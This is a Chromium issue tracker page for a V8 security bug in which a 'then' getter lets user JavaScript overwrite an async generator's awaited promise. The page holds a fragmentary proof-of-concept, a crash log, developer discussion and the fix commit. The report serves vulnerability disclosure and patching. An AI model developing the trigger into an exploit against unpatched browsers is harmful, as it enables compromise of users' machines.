New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Closed: Feb 5
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac , Fuchsia
Pri: 1
Type: Bug-Security

Sign in to add a comment

Security: V8: AwaitedPromise update bug

Project Member Reported by, Jan 25 Back to list

Issue description

Here's a snippet of AsyncGeneratorReturn. (

  Node* const context = Parameter(Descriptor::kContext);
  Node* const outer_promise = LoadPromiseFromAsyncGeneratorRequest(req);
  Node* const promise =
      Await(context, generator, value, outer_promise, AwaitContext::kLength,
            init_closure_context, var_on_resolve.value(), var_on_reject.value(),

  CSA_SLOW_ASSERT(this, IsGeneratorNotSuspendedForAwait(generator));
  StoreObjectField(generator, JSAsyncGeneratorObject::kAwaitedPromiseOffset,

The Await methods calls ResolveNativePromise which calls InternalResolvePromise which can invoke a user JavaScript code through a "then" getter. If the AwaitedPromise is replaced by the user script, the AwaitedPromise will be immediately overwritten after the call to Await, this may lead the generator to an incorrect state.

async function* asyncGenerator() {

let gen = asyncGenerator();
    get then() {
        delete this.then;;

Log in debug mode:
abort: CSA_ASSERT failed: IsNotUndefined(request) [../../src/builtins/]

==== JS stack trace =========================================

Security context: 0x2b29083a3a71 <JSObject>#0#
    2: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#)

==== Details ================================================

[2]: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#) {
// optimized frame
--------- s o u r c e   c o d e ---------
<No Source>
==== Key         ============================================

 #0# 0x2b29083a3a71: 0x2b29083a3a71 <JSObject>
 #1# 0x19b7b0603721: 0x19b7b0603721 <JSGlobal Object>
 #2# 0x19b7b060d139: 0x19b7b060d139 <Object map = 0x189055388c91>

Received signal 4 ILL_ILLOPN 7fb143ae2781

==== C stack trace ===============================

[end of stack trace]
Illegal instruction

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Project Member

Comment 1 by ClusterFuzz, Jan 25

ClusterFuzz is analyzing your testcase. Developers can follow the progress at
Status: Assigned (was: Unconfirmed)
I'm guessing the iOS-only label was accidental? 

neis: Can you please take a look?
Labels: -OS-iOS
Caitlin, please have a look.

It seems that not having an explicit "awaiting-return" state is problematic. From what I can tell, the write to kAwaitedPromiseOffset in AsyncGeneratorReturn happens too late, because the Await can trigger a reentrance of this code.
If you have cycles to take this, you should. I can assist in small ways, but won’t be back to my normal v8 schedule for some time.
Status: Started (was: Assigned)
neis: Can you please help assign a Security_Impact label? Does this affect stable channel?
Labels: Security_Impact-Stable
Project Member

Comment 15 by, Jan 30

Labels: M-64
Project Member

Comment 16 by, Jan 31

The following revision refers to this bug:

commit 9c4c717b5d1765ff31f773df416115d3dd08de60
Author: Georg Neis <>
Date: Wed Jan 31 07:43:28 2018

Fix bug in async generators.

Async generators didn't correctly handle the situation where one calls
.return on a suspended-at-start async generator and passes a
promise-like object whose awaiting causes a new request to the

Bug:  chromium:805729 
Change-Id: I4da13ab5bd97f8c2a2c5373242a2d5e2ab0f7f10
Reviewed-by: Caitlin Potter <>
Reviewed-by: Jaroslav Sevcik <>
Commit-Queue: Georg Neis <>
Cr-Commit-Position: refs/heads/master@{#50974}

Status: Fixed (was: Started)
Project Member

Comment 18 by, Feb 8

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -M-64 M-66
Labels: OS-Android OS-Chrome OS-Fuchsia OS-Linux OS-Mac OS-Windows
Labels: Release-0-M66
Labels: CVE-2018-6106
Labels: CVE_description-missing
Project Member

Comment 24 by, May 14 (6 days ago)

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Sign in to add a comment